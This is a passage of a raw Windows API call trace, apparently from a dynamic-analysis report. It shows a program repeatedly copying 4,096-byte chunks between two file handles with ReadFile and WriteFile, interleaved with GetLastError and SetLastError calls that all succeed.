0x0 [0093.383] SetLastError (dwErrCode=0x0) [0093.383] GetLastError () returned 0x0 [0093.383] SetLastError (dwErrCode=0x0) [0093.383] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.383] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.384] GetLastError () returned 0x0 [0093.384] SetLastError (dwErrCode=0x0) [0093.384] GetLastError () returned 0x0 [0093.384] SetLastError (dwErrCode=0x0) [0093.384] GetLastError () returned 0x0 [0093.384] SetLastError (dwErrCode=0x0) [0093.384] GetLastError () returned 0x0 [0093.384] SetLastError (dwErrCode=0x0) [0093.385] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.385] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.385] GetLastError () returned 0x0 [0093.385] SetLastError (dwErrCode=0x0) [0093.385] GetLastError () returned 0x0 [0093.385] SetLastError (dwErrCode=0x0) [0093.386] GetLastError () returned 0x0 [0093.386] SetLastError (dwErrCode=0x0) [0093.386] GetLastError () returned 0x0 [0093.386] SetLastError (dwErrCode=0x0) [0093.386] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.386] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.386] GetLastError () returned 0x0 [0093.386] SetLastError (dwErrCode=0x0) [0093.386] GetLastError () returned 0x0 [0093.386] SetLastError (dwErrCode=0x0) [0093.386] GetLastError () returned 0x0 [0093.386] SetLastError (dwErrCode=0x0) [0093.387] GetLastError () returned 0x0 [0093.387] SetLastError (dwErrCode=0x0) [0093.387] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.387] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.387] GetLastError () returned 0x0 [0093.387] SetLastError (dwErrCode=0x0) [0093.387] GetLastError () returned 0x0 [0093.387] SetLastError (dwErrCode=0x0) [0093.387] GetLastError () returned 0x0 [0093.387] SetLastError (dwErrCode=0x0) [0093.387] GetLastError () returned 0x0 [0093.387] SetLastError (dwErrCode=0x0) [0093.388] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.388] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.388] GetLastError () returned 0x0 [0093.388] SetLastError (dwErrCode=0x0) [0093.388] GetLastError () returned 0x0 [0093.388] SetLastError (dwErrCode=0x0) [0093.388] GetLastError () returned 0x0 [0093.388] SetLastError (dwErrCode=0x0) [0093.388] GetLastError () returned 0x0 [0093.388] SetLastError (dwErrCode=0x0) [0093.388] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.389] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.389] GetLastError () returned 0x0 [0093.389] SetLastError (dwErrCode=0x0) [0093.389] GetLastError () returned 0x0 [0093.389] SetLastError (dwErrCode=0x0) [0093.389] GetLastError () returned 0x0 [0093.389] SetLastError (dwErrCode=0x0) [0093.389] GetLastError () returned 0x0 [0093.389] SetLastError (dwErrCode=0x0) [0093.389] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.389] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.390] GetLastError () returned 0x0 [0093.390] SetLastError (dwErrCode=0x0) [0093.390] GetLastError () returned 0x0 [0093.390] SetLastError (dwErrCode=0x0) [0093.390] GetLastError () returned 0x0 [0093.390] SetLastError (dwErrCode=0x0) [0093.390] GetLastError () returned 0x0 [0093.390] SetLastError (dwErrCode=0x0) [0093.390] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.390] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.391] GetLastError () returned 0x0 [0093.391] SetLastError (dwErrCode=0x0) [0093.391] GetLastError () returned 0x0 [0093.391] SetLastError (dwErrCode=0x0) [0093.391] GetLastError () returned 0x0 [0093.391] SetLastError (dwErrCode=0x0) [0093.391] GetLastError () returned 0x0 [0093.391] SetLastError (dwErrCode=0x0) [0093.391] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.391] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.391] GetLastError () returned 0x0 [0093.391] SetLastError (dwErrCode=0x0) [0093.392] GetLastError () returned 0x0 [0093.392] SetLastError (dwErrCode=0x0) [0093.392] GetLastError () returned 0x0 [0093.392] SetLastError (dwErrCode=0x0) [0093.392] GetLastError () returned 0x0 [0093.392] SetLastError (dwErrCode=0x0) [0093.392] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.392] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.392] GetLastError () returned 0x0 [0093.392] SetLastError (dwErrCode=0x0) [0093.392] GetLastError () returned 0x0 [0093.392] SetLastError (dwErrCode=0x0) [0093.393] GetLastError () returned 0x0 [0093.393] SetLastError (dwErrCode=0x0) [0093.393] GetLastError () returned 0x0 [0093.393] SetLastError (dwErrCode=0x0) [0093.393] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.393] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.393] GetLastError () returned 0x0 [0093.393] SetLastError (dwErrCode=0x0) [0093.393] GetLastError () returned 0x0 [0093.393] SetLastError (dwErrCode=0x0) [0093.393] GetLastError () returned 0x0 [0093.393] SetLastError (dwErrCode=0x0) [0093.393] GetLastError () returned 0x0 [0093.393] SetLastError (dwErrCode=0x0) [0093.393] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.393] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.394] GetLastError () returned 0x0 [0093.394] SetLastError (dwErrCode=0x0) [0093.394] GetLastError () returned 0x0 [0093.394] SetLastError (dwErrCode=0x0) [0093.394] GetLastError () returned 0x0 [0093.394] SetLastError (dwErrCode=0x0) [0093.394] GetLastError () returned 0x0 [0093.394] SetLastError (dwErrCode=0x0) [0093.394] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.394] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.394] GetLastError () returned 0x0 [0093.394] SetLastError (dwErrCode=0x0) [0093.394] GetLastError () returned 0x0 [0093.394] SetLastError (dwErrCode=0x0) [0093.394] GetLastError () returned 0x0 [0093.394] SetLastError (dwErrCode=0x0) [0093.394] GetLastError () returned 0x0 [0093.394] SetLastError (dwErrCode=0x0) [0093.394] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.394] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.395] GetLastError () returned 0x0 [0093.395] SetLastError (dwErrCode=0x0) [0093.395] GetLastError () returned 0x0 [0093.395] SetLastError (dwErrCode=0x0) [0093.395] GetLastError () returned 0x0 [0093.395] SetLastError (dwErrCode=0x0) [0093.395] GetLastError () returned 0x0 [0093.395] SetLastError (dwErrCode=0x0) [0093.395] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.395] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.395] GetLastError () returned 0x0 [0093.395] SetLastError (dwErrCode=0x0) [0093.395] GetLastError () returned 0x0 [0093.395] SetLastError (dwErrCode=0x0) [0093.395] GetLastError () returned 0x0 [0093.395] SetLastError (dwErrCode=0x0) [0093.395] GetLastError () returned 0x0 [0093.395] SetLastError (dwErrCode=0x0) [0093.395] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.396] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.396] GetLastError () returned 0x0 [0093.396] SetLastError (dwErrCode=0x0) [0093.396] GetLastError () returned 0x0 [0093.396] SetLastError (dwErrCode=0x0) [0093.396] GetLastError () returned 0x0 [0093.396] SetLastError (dwErrCode=0x0) [0093.396] GetLastError () returned 0x0 [0093.396] SetLastError (dwErrCode=0x0) [0093.396] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.396] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.396] GetLastError () returned 0x0 [0093.396] SetLastError (dwErrCode=0x0) [0093.396] GetLastError () returned 0x0 [0093.396] SetLastError (dwErrCode=0x0) [0093.396] GetLastError () returned 0x0 [0093.396] SetLastError (dwErrCode=0x0) [0093.396] GetLastError () returned 0x0 [0093.397] SetLastError (dwErrCode=0x0) [0093.397] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.397] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.397] GetLastError () returned 0x0 [0093.397] SetLastError (dwErrCode=0x0) [0093.397] GetLastError () returned 0x0 [0093.397] SetLastError (dwErrCode=0x0) [0093.397] GetLastError () returned 0x0 [0093.397] SetLastError (dwErrCode=0x0) [0093.397] GetLastError () returned 0x0 [0093.397] SetLastError (dwErrCode=0x0) [0093.397] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.397] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.397] GetLastError () returned 0x0 [0093.397] SetLastError (dwErrCode=0x0) [0093.397] GetLastError () returned 0x0 [0093.397] SetLastError (dwErrCode=0x0) [0093.397] GetLastError () returned 0x0 [0093.398] SetLastError (dwErrCode=0x0) [0093.398] GetLastError () returned 0x0 [0093.398] SetLastError (dwErrCode=0x0) [0093.398] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.398] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.398] GetLastError () returned 0x0 [0093.398] SetLastError (dwErrCode=0x0) [0093.398] GetLastError () returned 0x0 [0093.398] SetLastError (dwErrCode=0x0) [0093.398] GetLastError () returned 0x0 [0093.398] SetLastError (dwErrCode=0x0) [0093.398] GetLastError () returned 0x0 [0093.398] SetLastError (dwErrCode=0x0) [0093.398] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.398] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.398] GetLastError () returned 0x0 [0093.398] SetLastError (dwErrCode=0x0) [0093.398] GetLastError () returned 0x0 [0093.399] SetLastError (dwErrCode=0x0) [0093.399] GetLastError () returned 0x0 [0093.399] SetLastError (dwErrCode=0x0) [0093.399] GetLastError () returned 0x0 [0093.399] SetLastError (dwErrCode=0x0) [0093.399] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.399] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.399] GetLastError () returned 0x0 [0093.399] SetLastError (dwErrCode=0x0) [0093.399] GetLastError () returned 0x0 [0093.399] SetLastError (dwErrCode=0x0) [0093.399] GetLastError () returned 0x0 [0093.399] SetLastError (dwErrCode=0x0) [0093.399] GetLastError () returned 0x0 [0093.399] SetLastError (dwErrCode=0x0) [0093.399] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.399] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.399] GetLastError () returned 0x0 [0093.399] SetLastError (dwErrCode=0x0) [0093.399] GetLastError () returned 0x0 [0093.400] SetLastError (dwErrCode=0x0) [0093.400] GetLastError () returned 0x0 [0093.400] SetLastError (dwErrCode=0x0) [0093.400] GetLastError () returned 0x0 [0093.400] SetLastError (dwErrCode=0x0) [0093.400] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.400] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.400] GetLastError () returned 0x0 [0093.400] SetLastError (dwErrCode=0x0) [0093.400] GetLastError () returned 0x0 [0093.400] SetLastError (dwErrCode=0x0) [0093.400] GetLastError () returned 0x0 [0093.400] SetLastError (dwErrCode=0x0) [0093.400] GetLastError () returned 0x0 [0093.400] SetLastError (dwErrCode=0x0) [0093.400] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.400] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.401] GetLastError () returned 0x0 [0093.401] SetLastError (dwErrCode=0x0) [0093.401] GetLastError () returned 0x0 [0093.401] SetLastError (dwErrCode=0x0) [0093.401] GetLastError () returned 0x0 [0093.401] SetLastError (dwErrCode=0x0) [0093.401] GetLastError () returned 0x0 [0093.401] SetLastError (dwErrCode=0x0) [0093.401] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.401] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.401] GetLastError () returned 0x0 [0093.401] SetLastError (dwErrCode=0x0) [0093.401] GetLastError () returned 0x0 [0093.401] SetLastError (dwErrCode=0x0) [0093.401] GetLastError () returned 0x0 [0093.401] SetLastError (dwErrCode=0x0) [0093.401] GetLastError () returned 0x0 [0093.401] SetLastError (dwErrCode=0x0) [0093.401] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.401] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.402] GetLastError () returned 0x0 [0093.402] SetLastError (dwErrCode=0x0) [0093.402] GetLastError () returned 0x0 [0093.402] SetLastError (dwErrCode=0x0) [0093.402] GetLastError () returned 0x0 [0093.402] SetLastError (dwErrCode=0x0) [0093.402] GetLastError () returned 0x0 [0093.402] SetLastError (dwErrCode=0x0) [0093.402] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.402] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.402] GetLastError () returned 0x0 [0093.402] SetLastError (dwErrCode=0x0) [0093.402] GetLastError () returned 0x0 [0093.402] SetLastError (dwErrCode=0x0) [0093.402] GetLastError () returned 0x0 [0093.402] SetLastError (dwErrCode=0x0) [0093.402] GetLastError () returned 0x0 [0093.402] SetLastError (dwErrCode=0x0) [0093.402] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.402] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.403] GetLastError () returned 0x0 [0093.403] SetLastError (dwErrCode=0x0) [0093.403] GetLastError () returned 0x0 [0093.403] SetLastError (dwErrCode=0x0) [0093.403] GetLastError () returned 0x0 [0093.403] SetLastError (dwErrCode=0x0) [0093.403] GetLastError () returned 0x0 [0093.403] SetLastError (dwErrCode=0x0) [0093.403] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.403] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.403] GetLastError () returned 0x0 [0093.403] SetLastError (dwErrCode=0x0) [0093.403] GetLastError () returned 0x0 [0093.403] SetLastError (dwErrCode=0x0) [0093.403] GetLastError () returned 0x0 [0093.403] SetLastError (dwErrCode=0x0) [0093.403] GetLastError () returned 0x0 [0093.403] SetLastError (dwErrCode=0x0) [0093.403] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.403] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.404] GetLastError () returned 0x0 [0093.404] SetLastError (dwErrCode=0x0) [0093.404] GetLastError () returned 0x0 [0093.404] SetLastError (dwErrCode=0x0) [0093.404] GetLastError () returned 0x0 [0093.404] SetLastError (dwErrCode=0x0) [0093.404] GetLastError () returned 0x0 [0093.404] SetLastError (dwErrCode=0x0) [0093.404] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.512] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.519] GetLastError () returned 0x0 [0093.519] SetLastError (dwErrCode=0x0) [0093.519] GetLastError () returned 0x0 [0093.519] SetLastError (dwErrCode=0x0) [0093.519] GetLastError () returned 0x0 [0093.519] SetLastError (dwErrCode=0x0) [0093.519] GetLastError () returned 0x0 [0093.523] SetLastError (dwErrCode=0x0) [0093.523] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, 